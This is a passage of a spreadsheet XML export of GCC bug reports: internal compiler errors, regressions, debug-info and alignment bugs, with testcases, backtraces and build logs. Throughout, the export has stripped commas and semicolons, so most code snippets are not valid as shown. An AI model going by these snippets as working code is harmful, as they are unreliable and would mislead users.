testcase.C:2:30: error: template parameters not used in partial specialization:
testcase.C:2:30: error:         ''
testcase.C: In function 'void f()':
testcase.C:11:16:   recursively instantiated from 'void S::f()'
testcase.C:11:16:   instantiated from here
testcase.C:11:16: internal compiler error: in instantiate_decl at cp/pt.c:16657
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-15860</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 regression] No DW_AT_location debug info is emitted for formal arguments to a function that uses register qualifiers</t>
  </si>
  <si>
    <t>Compile the attached code with gcc -g -c structs2.c [structs2.c comes from 
the gdb testsuite]
The arguments to param_reg() are not described in the dwarf debug info. e.g.:
$ readelf -wi structs2.o
[...]
 : Abbrev Number: 6 (DW_TAG_formal_parameter)
     DW_AT_name        : (indirect string offset: 0x27): pr_char
     DW_AT_decl_file   : 1
     DW_AT_decl_line   : 28
     DW_AT_type        : 
No DW_AT_location information is given.
With gcc-3.0 I see:
 : Abbrev Number: 6 (DW_TAG_formal_parameter)
     DW_AT_name        : pr_char
     DW_AT_decl_file   : 1
     DW_AT_decl_line   : 28
     DW_AT_type        : 
     DW_AT_location    : 2 byte block: 91 b     (DW_OP_fbreg: 11)
param_reg() is defined as:
static void param_reg (register signed char pr_char
                       register unsigned char pr_uchar
                       register short pr_short
                       register unsigned short pr_ushort)
if the register qualifier is removed the correct debug information is 
emitted.
Dan Jacobowitz tells me that on i386/mips with gcc-3.3 he does not see this 
problem. On hppa-linux i see this with gcc-3.3/3.4/3.5
This was also observed by Corinna Vinschen (sh target):
http://sources.redhat.com/ml/gdb/2004-03/msg00043.html</t>
  </si>
  <si>
    <t>tausq</t>
  </si>
  <si>
    <t>GCC-50788</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in merge_overlapping_regs at regrename.c:318 with -mavx -fpeel-loops -fstack-protector-all and __builtin_ia32_maskloadpd256</t>
  </si>
  <si>
    <t>Created attachment 25552
reduced testcase
Compiler output:
$ gcc -O2 -mavx -fpeel-loops -fstack-protector-all testcase.c
testcase.c: In function 'foo':
testcase.c:7:1: internal compiler error: in merge_overlapping_regs at regrename.c:318
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
A bit different testcase with __builtin_ia32_maskloadd() crashes with -mavx2 the same way with the same backtrace.
(gdb) bt
#0  fancy_abort (file=0x1271d38 /mnt/svn/gcc-trunk/gcc/regrename.c line=318 function=0x12724e0 merge_overlapping_regs)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:898
#1  0x0000000000929419 in merge_overlapping_regs () at /mnt/svn/gcc-trunk/gcc/regrename.c:318
#2  rename_chains () at /mnt/svn/gcc-trunk/gcc/regrename.c:447
#3  regrename_optimize () at /mnt/svn/gcc-trunk/gcc/regrename.c:1783
#4  0x00000000008e5748 in execute_one_pass (pass=0x17a20e0) at /mnt/svn/gcc-trunk/gcc/passes.c:2064
#5  0x00000000008e5ab5 in execute_pass_list (pass=0x17a20e0) at /mnt/svn/gcc-trunk/gcc/passes.c:2119
#6  0x00000000008e5ac7 in execute_pass_list (pass=0x17a1840) at /mnt/svn/gcc-trunk/gcc/passes.c:2120
#7  0x00000000008e5ac7 in execute_pass_list (pass=0x17a18a0) at /mnt/svn/gcc-trunk/gcc/passes.c:2120
#8  0x0000000000a3cebe in tree_rest_of_compilation (fndecl=0x7ffff56b1f00) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:420
#9  0x000000000069433a in cgraph_expand_function (node=0x7ffff55886c0) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1804
#10 0x000000000069628c in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1871
#11 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2148
#12 0x000000000069667a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1312
#13 0x000000000057914b in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:9940
#14 0x00000000009dab04 in compile_file (argc=16 argv=0x7fffffffdaa8) at /mnt/svn/gcc-trunk/gcc/toplev.c:581
#15 do_compile (argc=16 argv=0x7fffffffdaa8) at /mnt/svn/gcc-trunk/gcc/toplev.c:1930
#16 toplev_main (argc=16 argv=0x7fffffffdaa8) at /mnt/svn/gcc-trunk/gcc/toplev.c:2006
#17 0x00007ffff6178d2d in __libc_start_main () from /lib64/libc.so.6
#18 0x000000000055ccc9 in _start ()
Tested revisions:
r180174 - crash
r179959 - crash
r178498 - OK
4.6 r177922 - OK</t>
  </si>
  <si>
    <t>GCC-43735</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gcc.dg/guality/inline-params.c</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 158227 gave:
FAIL: gcc.dg/guality/inline-params.c  -O2 -fwhopr  execution test
Revision 158222 is OK. Revision 158225:
http://gcc.gnu.org/ml/gcc-cvs/2010-04/msg00329.html
may be the cause.</t>
  </si>
  <si>
    <t>GCC-1403</t>
  </si>
  <si>
    <t>interface inner classes are implicitly static</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: I submitted a patch for this:
    http://gcc.gnu.org/ml/gcc-patches/2000-12/msg00829.html
</t>
  </si>
  <si>
    <t>osk</t>
  </si>
  <si>
    <t>GCC-8515</t>
  </si>
  <si>
    <t>[PPC] incoming altivec vectors on the stack unaligned to 16</t>
  </si>
  <si>
    <t>gcc stores incomming altivec vector arguments on the stack unaligned to 16 but to an 8 byte alignment which is wrong because stvx and lvx do not care about the lower 8 bits of the address so it could corrupted the stack.
Release:
gcc version 3.3 20021108 (experimental)
Environment:
powerpc-apple-darwin6.1
How-To-Repeat:
Run the following program and see that three out of the four addresses are not 16 byte aligned.
Compiled with -maltivec -include altivec.h -Wa-force_cpusubtype_ALL.
void PrintShortVector (vector signed short v )
void PrintShortVector1 (vector signed short v )
void main()
{
        PrintShortVector((vector signed short){12345678})
        PrintShortVector1((vector signed short){12345678})
}
  void PrintShortVector (vector signed short v )
  {
      signed short *vec = (signed short*)
      printf ((%p) (%p) %hd %hd %hd %hd %hd %hd %hd %hd 
             vec 
  }
  typedef union {
      vector signed short v 
      signed short vs[8] 
  } vv 
  void PrintShortVector1 (vector signed short v)
  {
      vv vv
      vv.v = v
      printf ((%p) (%p) %hd %hd %hd %hd %hd %hd %hd %hd   
  }
According to hartwood@crosslink.net it happens also on a VxWorks cross-compiler.</t>
  </si>
  <si>
    <t>GCC-39889</t>
  </si>
  <si>
    <t>[4.4 Regression] Bogus -Wunused-value warning</t>
  </si>
  <si>
    <t>/* { dg-do compile } */
/* { dg-options -Wunused-value } */
int x
int foo (void)
{
  return (1 ? x = 0 : (void) 0) 0 /* { dg-bogus value computed is not used } */
}
warns in 4.4 didn't warn in 4.3 (pre-tuples merge) and doesn't warn in 4.4 (since r145254).  I have a patch.</t>
  </si>
  <si>
    <t>GCC-27136</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Compile failure with -O -ffast-math</t>
  </si>
  <si>
    <t>This program compiled -O -ffast-math seems to consume infinite stack space
    /* -O -ffast-math */
    void foo()
    {
      double x
      for (x = 2 x &lt; 10 x *= x)
    }</t>
  </si>
  <si>
    <t>trt</t>
  </si>
  <si>
    <t>GCC-34380</t>
  </si>
  <si>
    <t>[4.2 regression] Bug box Assert_Failure elists.adb:167 on illegal Ada 2005 program</t>
  </si>
  <si>
    <t>This is the same bug box as in PR ada/34344 but it happens only in 4.2.2 and with a different test case therefore I think this is a different bug.
package pak3 is
   type T1 is interface
   type T2 is null record
   x2: T2
   function f1 (x: access T1'class) return integer
   x1: integer := T1'Class (x2).f1
end pak3
gcc-4.1 -c -gnat05 pak3.ads
pak3.ads:6:32: no selector f1 for type T1'class defined at line 2
gcc -c pak3.ads -gnat05
+===========================GNAT BUG DETECTED==============================+
| 4.2.2 (i686-unknown-linux-gnu) Assert_Failure elists.adb:167             |
| Error detected at pak3.ads:8:21                                          |</t>
  </si>
  <si>
    <t>GCC-24959</t>
  </si>
  <si>
    <t>Trampolines fail on i686-apple-darwin because stack is not executable</t>
  </si>
  <si>
    <t>The testsuite program gcc.c-torture/execute/nestfunc-3.c crashes with a bus error on i686-apple-darwin8. Tried it with gcc-3.4.4 gcc-4.0.2 and gcc-4.1-20051112.</t>
  </si>
  <si>
    <t>echristo</t>
  </si>
  <si>
    <t>GCC-18846</t>
  </si>
  <si>
    <t>Illegal program accepted RM 10.2.1(10) 12.3(1.a)</t>
  </si>
  <si>
    <t>(Debian bug #284333)
-- RM 10.2.1(10):  A generic body is preelaborable only if elaboration
-- of a corresponding instance body would not perform any such actions
-- [assuming the worst about possible actual generic parameters]
-- AARM 12.3(1.a): The legality of an instance should be determinable
-- without looking at the generic body. Likewise the legality of a
-- generic body should be determinable without looking at any instances.
generic
   x1: integer
package Test_135 is
   pragma Preelaborate
   pragma Elaborate_Body
end Test_135
package body Test_135 is
   x2: integer := x1   -- ERROR: not preelaborable
end Test_135
The compiler is silent I expect an error message like:
test_135.adb:3:18: object in preelaborated unit has non-static default
gnatmake: test_135.adb compilation error</t>
  </si>
  <si>
    <t>GCC-28227</t>
  </si>
  <si>
    <t>valid #ifdef rejected</t>
  </si>
  <si>
    <t>GCC rejects this:
#ifdef defined
#endif
Even though C99 6.10.8.4 specifies that 'defined' is only disallowed after #undef or #define.
-Chris</t>
  </si>
  <si>
    <t>sabre</t>
  </si>
  <si>
    <t>GCC-82851</t>
  </si>
  <si>
    <t>[8 regression] g++.dg/vect/slp-pr56812.cc i386/avx2-vpaddq-3.c i386/avx2-vpsubq-3.c fails</t>
  </si>
  <si>
    <t>r253975 triggers these fails:
spawn -ignore SIGHUP /work/gcc/testsuite/g++6/../../xg++ -B/work/gcc/testsuite/g++6/../../ /source/gcc/testsuite/g++.dg/vect/slp-pr56812.cc -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/work/x86_64-pc-linux-gnu/libstdc++-v3/include/x86_64-pc-linux-gnu -I/work/x86_64-pc-linux-gnu/libstdc++-v3/include -I/source/libstdc++-v3/libsupc++ -I/source/libstdc++-v3/include/backward -I/source/libstdc++-v3/testsuite/util -fmessage-length=0 -std=c++98 -O2 -ftree-vectorize -fno-vect-cost-model -msse2 -fdump-tree-slp-details -O3 -funroll-loops -fvect-cost-model=dynamic -S -o slp-pr56812.s
PASS: g++.dg/vect/slp-pr56812.cc  -std=c++98 (test for excess errors)
FAIL: g++.dg/vect/slp-pr56812.cc  -std=c++98  scan-tree-dump-times slp1 basic block vectorized 1 (found 0 times)
---
spawn -ignore SIGHUP /work/gcc/xgcc -B/work/gcc/ /source/gcc/testsuite/gcc.target/i386/avx2-vpaddq-3.c -B/work/x86_64-pc-linux-gnu/./libmpx/ -B/work/x86_64-pc-linux-gnu/./libmpx/mpxrt -L/work/x86_64-pc-linux-gnu/./libmpx/mpxrt/.libs -B/work/x86_64-pc-linux-gnu/./libmpx/ -B/work/x86_64-pc-linux-gnu/./libmpx/mpxwrap -L/work/x86_64-pc-linux-gnu/./libmpx/mpxwrap/.libs -fno-diagnostics-show-caret -fdiagnostics-color=never -mavx2 -mno-prefer-avx128 -O2 -ftree-vectorize -save-temps -ffat-lto-objects -lm -o ./avx2-vpaddq-3.exe
PASS: gcc.target/i386/avx2-vpaddq-3.c (test for excess errors)
PASS: gcc.target/i386/avx2-vpaddq-3.c execution test
FAIL: gcc.target/i386/avx2-vpaddq-3.c scan-assembler-times vpaddq[ \\t]+[^\n]*%ymm[0-9] 1 (found 0 times)
---
spawn -ignore SIGHUP /work/gcc/xgcc -B/work/gcc/ /source/gcc/testsuite/gcc.target/i386/avx2-vpsubq-3.c -B/work/x86_64-pc-linux-gnu/./libmpx/ -B/work/x86_64-pc-linux-gnu/./libmpx/mpxrt -L/work/x86_64-pc-linux-gnu/./libmpx/mpxrt/.libs -B/work/x86_64-pc-linux-gnu/./libmpx/ -B/work/x86_64-pc-linux-gnu/./libmpx/mpxwrap -L/work/x86_64-pc-linux-gnu/./libmpx/mpxwrap/.libs -fno-diagnostics-show-caret -fdiagnostics-color=never -mavx2 -mno-prefer-avx128 -O2 -ftree-vectorize -save-temps -ffat-lto-objects -lm -o ./avx2-vpsubq-3.exe
PASS: gcc.target/i386/avx2-vpsubq-3.c (test for excess errors)
PASS: gcc.target/i386/avx2-vpsubq-3.c execution test
FAIL: gcc.target/i386/avx2-vpsubq-3.c scan-assembler-times vpsubq[ \\t]+[^\n]*%ymm[0-9] 1 (found 0 times)
Option set:
-with-system-zlib --with-demangler-in-ld --with-fpmath=sse --enable-shared --enable-host-shared --enable-clocale=gnu --enable-cloog-backend=isl --enable-languages=cc++fortranjitlto -with-arch=slm --with-cpu=slm</t>
  </si>
  <si>
    <t>andrey.y.guskov</t>
  </si>
  <si>
    <t>GCC-83100</t>
  </si>
  <si>
    <t>[8 Regression] powerpc: internal compiler error: in get_variable_section at varasm.c:1150 with -fdata-sections</t>
  </si>
  <si>
    <t>Created attachment 42676
preprocessed source (from nss-3.34)
$ gcc-7 -c -O1 -fdata-sections pkix_errpaths.i
$ gcc-8 -c -O1 -fdata-sections pkix_errpaths.i
pkix_errpaths.c:102:1: internal compiler error: in get_variable_section at varasm.c:1150
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gcc-8 --version
gcc-8 (Debian 8-20171108-1) 8.0.0 20171108 (experimental) [trunk revision 254551]
...
Works with -O0 ICE with &gt;= -O1.
Reproduced on 64bit little endian and 32bit big endian powerpc.</t>
  </si>
  <si>
    <t>GCC-48395</t>
  </si>
  <si>
    <t>[4.7 regression] segmentation fault when compiling libgcc2.c</t>
  </si>
  <si>
    <t>Created attachment 23842
GDB transcript
trunk r171783 cannot compile its own libgcc2.c for the AVR target:
gmake[4]: Entering directory `/junk/gcc/trunk/build-avr/avr/avr25/libgcc'
# If this is the top-level multilib build all the other
# multilibs.
/junk/gcc/trunk/build-avr/./gcc/xgcc -B/junk/gcc/trunk/build-avr/./gcc/ -B/junk/testroot/avr/bin/ -B/junk/testroot/avr/lib/ -isystem /junk/testroot/avr/include -isystem /junk/testroot/avr/sys-include    -g -O2 -mmcu=avr25 -O2  -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -DDF=SF -Dinhibit_libc -mcall-prologues -Os -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -fno-stack-protector -Dinhibit_libc  -I. -I. -I../../.././gcc -I../../../../libgcc -I../../../../libgcc/. -I../../../../libgcc/../gcc -I../../../../libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o _negdi2.o -MT _negdi2.o -MD -MP -MF _negdi2.dep -DL_negdi2 -c ../../../../libgcc/../gcc/libgcc2.c \
../../../../libgcc/../gcc/libgcc2.c: In function â€˜__negdi2â€™:
../../../../libgcc/../gcc/libgcc2.c:68:17: internal compiler error: Segmentation fault: 11
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[4]: *** [_negdi2.o] Error 1
gmake[4]: Leaving directory `/junk/gcc/trunk/build-avr/avr/avr25/libgcc'
gmake[3]: *** [multi-do] Error 1
gmake[3]: Leaving directory `/junk/gcc/trunk/build-avr/avr/libgcc'
gmake[2]: *** [all-multi] Error 2
gmake[2]: Leaving directory `/junk/gcc/trunk/build-avr/avr/libgcc'
gmake[1]: *** [all-target-libgcc] Error 2
gmake[1]: Leaving directory `/junk/gcc/trunk/build-avr'
gmake: *** [all] Error 2
(Also attaching the GDB transcript separately for better readability.
See below for my conclusion about the nature of the bug.)
The debugger shows the following stack trace:
(gdb) bt
#0  scratch_operand (op=0x959 mode=HImode) at ../../gcc/recog.c:1078
#1  0x08375db4 in insn_operand_matches (icode=CODE_FOR_setmemhi opno=4 operand=0x959) at ../../gcc/optabs.c:6999
#2  0x083760d9 in maybe_legitimize_operands (icode=CODE_FOR_setmemhi opno=0 nops=5 ops=0xbfbfda2c) at ../../gcc/optabs.c:7074
#3  0x083762c3 in maybe_gen_insn (icode=CODE_FOR_setmemhi nops=5 ops=0xbfbfda2c) at ../../gcc/optabs.c:7124
#4  0x083764cf in maybe_expand_insn (icode=CODE_FOR_setmemhi nops=5 ops=0xbfbfda2c) at ../../gcc/optabs.c:7155
#5  0x08231f19 in set_storage_via_setmem (object=0x28b4f2dc size=0x28a1b2f8 val=0x28a1b2b8 align=Variable align is not available.
) at ../../gcc/expr.c:2738
#6  0x08246b41 in clear_storage_hints (object=0x28b4f2dc size=0x28a1b2f8 method=BLOCK_OP_NORMAL expected_align=0 
    expected_size=-1) at ../../gcc/expr.c:2579
#7  0x08246c7f in clear_storage (object=0x28b4f2dc size=0x28a1b2f8 method=BLOCK_OP_NORMAL) at ../../gcc/expr.c:2594
#8  0x08239a1d in store_constructor (exp=0x28b10848 target=0x28b4f2dc cleared=0 size=8) at ../../gcc/expr.c:5196
#9  0x0823a729 in expand_constructor (exp=0x28b10848 target=0x28b4f2dc modifier=EXPAND_NORMAL avoid_temp_mem=0 '\0')
    at ../../gcc/expr.c:7100
#10 0x0823d56a in expand_expr_real_1 (exp=0x28b10848 target=0x28b4f2dc tmode=BLKmode modifier=EXPAND_NORMAL alt_rtl=0xbfbfdd9c)
    at ../../gcc/expr.c:8659
#11 0x08246d53 in store_expr (exp=0x28b10848 target=0x28b4f2dc call_param_p=0 nontemporal=0 '\0') at ../../gcc/expr.c:4653
#12 0x08236f47 in expand_assignment (to=0x28b2b120 from=0x28b10848 nontemporal=Variable nontemporal is not available.
) at ../../gcc/expr.c:4441
#13 0x081950a1 in expand_gimple_stmt (stmt=0x28b2f6c0) at ../../gcc/cfgexpand.c:1972
#14 0x08195a98 in expand_gimple_basic_block (bb=0x28a926c0) at ../../gcc/cfgexpand.c:3637
#15 0x08197028 in gimple_expand_cfg () at ../../gcc/cfgexpand.c:4120
#16 0x08391a57 in execute_one_pass (pass=0x881b120) at ../../gcc/passes.c:1555
#17 0x08391e9d in execute_pass_list (pass=0x881b120) at ../../gcc/passes.c:1610
#18 0x0847174a in tree_rest_of_compilation (fndecl=0x28afea00) at ../../gcc/tree-optimize.c:422
#19 0x0861c209 in cgraph_expand_function (node=0x28b09f24) at ../../gcc/cgraphunit.c:1575
#20 0x0861f842 in cgraph_optimize () at ../../gcc/cgraphunit.c:1634
#21 0x0861fd2a in cgraph_finalize_compilation_unit () at ../../gcc/cgraphunit.c:1095
#22 0x080a3998 in c_write_global_declarations () at ../../gcc/c-decl.c:9879
#23 0x0840af90 in do_compile () at ../../gcc/toplev.c:591
#24 0x0840b73d in toplev_main (argc=83 argv=0xbfbfe240) at ../../gcc/toplev.c:1963
#25 0x08140292 in main (argc=Error accessing memory address 0x959: Bad address.
) at ../../gcc/main.c:36
By browsing through the individual functions I eventually stumbled
upon set_storage_via_setmem() setting up the ops table which causes
the segfault:
(gdb) up 5
#5  0x08231f19 in set_storage_via_setmem (object=0x28b4f2dc size=0x28a1b2f8 val=0x28a1b2b8 align=Variable align is not available.
) at ../../gcc/expr.c:2738
2738              if (maybe_expand_insn (code nops ops))
(gdb) l set_storage_via_setmem 
2689    /* Expand a setmem pattern return true if successful.  */
2690
2691    bool
2692    set_storage_via_setmem (rtx object rtx size rtx val unsigned int align
2693                            unsigned int expected_align HOST_WIDE_INT expected_size)
2694    {
2695      /* Try the most limited insn first because there's no point
2696         including more than one in the machine description unless
2697         the more limited one has some advantage.  */
2698
(gdb) l
2699      enum machine_mode mode
2700
2701      if (expected_align &lt; align)
2702        expected_align = align
2703
2704      for (mode = GET_CLASS_NARROWEST_MODE (MODE_INT) mode != VOIDmode
2705           mode = GET_MODE_WIDER_MODE (mode))
2706        {
2707          enum insn_code code = direct_optab_handler (setmem_optab mode)
2708
(gdb) l
2709          if (code != CODE_FOR_nothing
2710              /* We don't need MODE to be narrower than
2711                 BITS_PER_HOST_WIDE_INT here because if SIZE is less than
2712                 the mode mask as it is returned by the macro it will
2713                 definitely be less than the actual mode mask.  */
2714              &amp;&amp; ((CONST_INT_P (size)
2715                   &amp;&amp; ((unsigned HOST_WIDE_INT) INTVAL (size)
2716                       &gt; 1)))
2717                  || GET_MODE_BITSIZE (mode) &gt;= BITS_PER_WORD))
2718            {
(gdb) l
2719              struct expand_operand ops[6]
2720              unsigned int nops
2721
2722              nops = insn_data[(int) code].n_operands
2723              /* ??? n_operands includes match_scratches find some other
2724                 way to select the 6 operand variant or force all targets
2725                 to have exactly 6 operands.  */
2726              gcc_assert (nops &gt;= 4 
2727
2728              create_fixed_operand (
(gdb) l
2729              /* The check above guarantees that this size conversion is valid.  */
2730              create_convert_operand_to (
2731              create_convert_operand_from (
2732              create_integer_operand (
2733              if (nops == 6)
2734                {
2735                  create_integer_operand (
2736                  create_integer_operand (
2737                }
2738              if (maybe_expand_insn (code nops ops))
(gdb) l
2739                return true
2740            }
2741        }
2742
2743      return false
2744    }
2745
2746    ^L
2747    /* Write to one of the components of the complex value CPLX.  Write VAL to
2748       the real part if IMAG_P is false and the imaginary part if its true.  */
(gdb) p ops
$27 = {{type = EXPAND_FIXED unsigned_p = 0 unused = 0 mode = VOIDmode value = 0x28b4f2dc} {type = EXPAND_CONVERT_TO 
    unsigned_p = 1 unused = 0 mode = HImode value = 0x28a1b2f8} {type = EXPAND_CONVERT_FROM unsigned_p = 1 unused = 0 
    mode = QImode value = 0x28a1b2b8} {type = EXPAND_INTEGER unsigned_p = 0 unused = 0 mode = VOIDmode value = 0x28a1b2c0} {
    type = 48 unsigned_p = 1 unused = 93 mode = 2140 value = 0x959} {type = 7 unsigned_p = 0 unused = 113 mode = 16068 
    value = 0x2}}
(gdb) p nops
$28 = 5
Note that for nops == 5 the code in lines 2735/2736 is not executed
so ops[4] and ops[5] remain undefined.  The assertion in line 2726
however explicitly allows for nops being 4 5 or 6.</t>
  </si>
  <si>
    <t>GCC-17763</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] Wrong context in error message for template parameter</t>
  </si>
  <si>
    <t>It seems that in some cases g++ reports in diagnostic messages type names of
template parameters based on the names used in the first instantiation of the
template and not those that appear in the context of the error. Roughly if ABX
and Y are all typedef-ed to int then g++ can report error about incorrect usage
of class T where it has to report incorrect usage of class T. Here is
a small application that reproduces this problem in G++ 3.2 and accordingly to
my professor in 3.4:
#include 
int main()
{
  typedef int X
  typedef int Y
  typedef std::map XYMap // X and Y happen to be int
  XYMap xy // This will instantiate std::map
  xy[0] = 1
  typedef int A
  typedef int B
  typedef std::map  ABMap  // A and B also happen to be int
  typedef std::pair ABPair
  ABMap  ab     // Code for this was already instantiated higher!
  ABPair p(01) // Pair of A B. Not relevant required to generate error
  ab[0] = 1
  ABMap::iterator q = ab.begin()
  // Here we get an error message because map's value_type is pair
  // and not pair as we try to compare it to.
  // BUT: Look which types are reported as types of map's value_type: 
  // they are X and Y which are completely irrelevant to ABMap! 
  // It seems g++ just peeks the type names of the first instantiation with such
  // actual types which actually generates code for both maps.
  assert(*q == p)
  return 0
}
Here is what compiler gives when I run it as: gcc -v -save-temps err_rep.cpp
==8&lt;=========================================================================
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --with-system-zlib --enable-__cxa_atexit --host=i386-redhat-linux
Thread model: posix
gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/cpp0 -lang-c++ -D__GNUG__=3
-D__DEPRECATED -D__EXCEPTIONS -v -D__GNUC__=3 -D__GNUC_MINOR__=2
-D__GNUC_PATCHLEVEL__=2 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__
-Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux
-Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386
-Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ err_rep.cpp err_rep.ii
GNU CPP version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.2.2
 /usr/include/c++/3.2.2/i386-redhat-linux
 /usr/include/c++/3.2.2/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/cc1plus -fpreprocessed err_rep.ii
-quiet -dumpbase err_rep.cpp -version -o err_rep.s
GNU CPP version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) (i386-redhat-linux)
	compiled by GNU C version 3.2.2 20030222 (Red Hat Linux 3.2.2-5).
err_rep.cpp: In function `int main()':
err_rep.cpp:30: no match for `std::pair&amp; == main()::ABPair&amp;' 
   operator
==8&lt;=========================================================================
Line 30 corresponds to line with assert.</t>
  </si>
  <si>
    <t>solodon</t>
  </si>
  <si>
    <t>GCC-43480</t>
  </si>
  <si>
    <t>build: random timestamps have multilib conflicts</t>
  </si>
  <si>
    <t>The problem I am trying to solve is:
Transaction Check Error:
  file /usr/share/man/man1/gcj-dbtool.1.gz conflicts between attempted installs of libgcj-4.4.3-8.fc13.x86_64 and libgcj-4.4.3-8.fc13.i686
  file /usr/share/man/man1/gij.1.gz conflicts between attempted installs of libgcj-4.4.3-8.fc13.x86_64 and libgcj-4.4.3-8.fc13.i686
  file /usr/share/man/man1/grmic.1.gz conflicts between attempted installs of libgcj-4.4.3-8.fc13.x86_64 and libgcj-4.4.3-8.fc13.i686
  file /usr/share/man/man1/jv-convert.1.gz conflicts between attempted installs of libgcj-4.4.3-8.fc13.x86_64 and libgcj-4.4.3-8.fc13.i686
It is due to:
gzip -dc ./libgcj-4.4.3-8.fc13.i686/usr/share/man/man1/gij.1.gz &gt;gij-i686
gzip -dc ./libgcj-4.4.3-8.fc13.x86_64/usr/share/man/man1/gij.1.gz &gt;gij-x86_64
diff -u gij-*
--- gij-i686	2010-03-22 10:17:59.000000000 +0100
+++ gij-x86_64	2010-03-22 10:18:07.000000000 +0100
@@ -1247 +1247 @@
 .\ ========================================================================
 .\
 .IX Title GIJ 1
-.TH GIJ 1 2010-02-27 gcc-4.4.3 GNU
+.TH GIJ 1 2010-02-26 gcc-4.4.3 GNU
 .\ For nroff turn off justification.  Always turn off hyphenation it makes
 .\ way too many mistakes in technical documents.
 .if n .ad l
One host built that file a different time (day) then a different host.
Moreover the files content should not depend on their time of build.
Patch applies to both GCC HEAD SVN and fastjar CVS.
fastjar/
2010-03-22  Jan Kratochvil  
        * Makefile.am (fastjar.pod grepjar.pod): Preserve modification time.
        * Makefile.in: Regenerate.
gcc/java/
2010-03-22  Jan Kratochvil  
        * Make-lang.in (gcj.pod jcf-dump.pod gij.pod jv-convert.pod)
        (grmic.pod gcj-dbtool.pod gc-analyze.pod aot-compile.pod)
        (rebuild-gcj-db.pod): Preserve modification time.
gcc/fortran/
2010-03-22  Jan Kratochvil  
        * Make-lang.in (gfortran.pod): Preserve modification time.
gcc/
2010-03-22  Jan Kratochvil  
        * Makefile.in (%.pod gcc.pod gfdl.pod fsf-funding.pod gpl.pod):
        Preserve modification time.
libjava/classpath/
2010-03-22  Jan Kratochvil  
        * doc/Makefile.am (gappletviewer.pod gjarsigner.pod gjar.pod)
        (gcjh.pod gjavah.pod gkeytool.pod gnative2ascii.pod gorbd.pod)
        (grmid.pod grmiregistry.pod gserialver.pod gtnameserv.pod)
        (gjdoc.pod): Preserve modification time.
        * doc/Makefile.in: Regenerate.</t>
  </si>
  <si>
    <t>jan.kratochvil</t>
  </si>
  <si>
    <t>GCC-26557</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in simplify_subreg</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/349083]
gcc version 4.0.3 20060212 (prerelease) (Debian 4.0.2-9)
falk@gluck:~% cat test.cc
struct sample_struct {
    static const int struct_test[]
}
const int sample_struct::struct_test[] = {1}
void g()
void f() {
    for(int i = 0 i &lt; 1 ++i){
        switch(sample_struct::struct_test[i]) {
        case 1: g()
        }
    }
}
falk@gluck:~% g++ -c test.cc   
falk@gluck:~% g++ -c test.cc -O
test.cc: In function 'void f()':
test.cc:11: internal compiler error: in simplify_subreg at simplify-rtx.c:3744
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
No problem with g++-3.3 (GCC) 3.3.6 (Debian 1:3.3.6-12)</t>
  </si>
  <si>
    <t>GCC-25034</t>
  </si>
  <si>
    <t>allows passing of contained subprograms as actual argument</t>
  </si>
  <si>
    <t>schluter@pcl247d:~/src&gt; cat t.f90
subroutine a
  call f(g)
contains
  function g(x)
   x =0.
  end function g
end subroutine a
schluter@pcl247d:~/src&gt; gcc/build/gcc/f951 -quiet t.f90
t.f90: In function 'g':
t.f90:5: warning: Function return value not set
schluter@pcl247d:~/src&gt; 
This is not allowed as can be understood by considering what happens if a variable of the containing function's scope is referenced.</t>
  </si>
  <si>
    <t>GCC-39476</t>
  </si>
  <si>
    <t>Typo in ix86_function_regparm in i386.c</t>
  </si>
  <si>
    <t>ix86_function_regparm in i386.c has
 if (TARGET_64BIT)
    {
      if (ix86_function_type_abi (type) == ix86_abi)
        return regparm
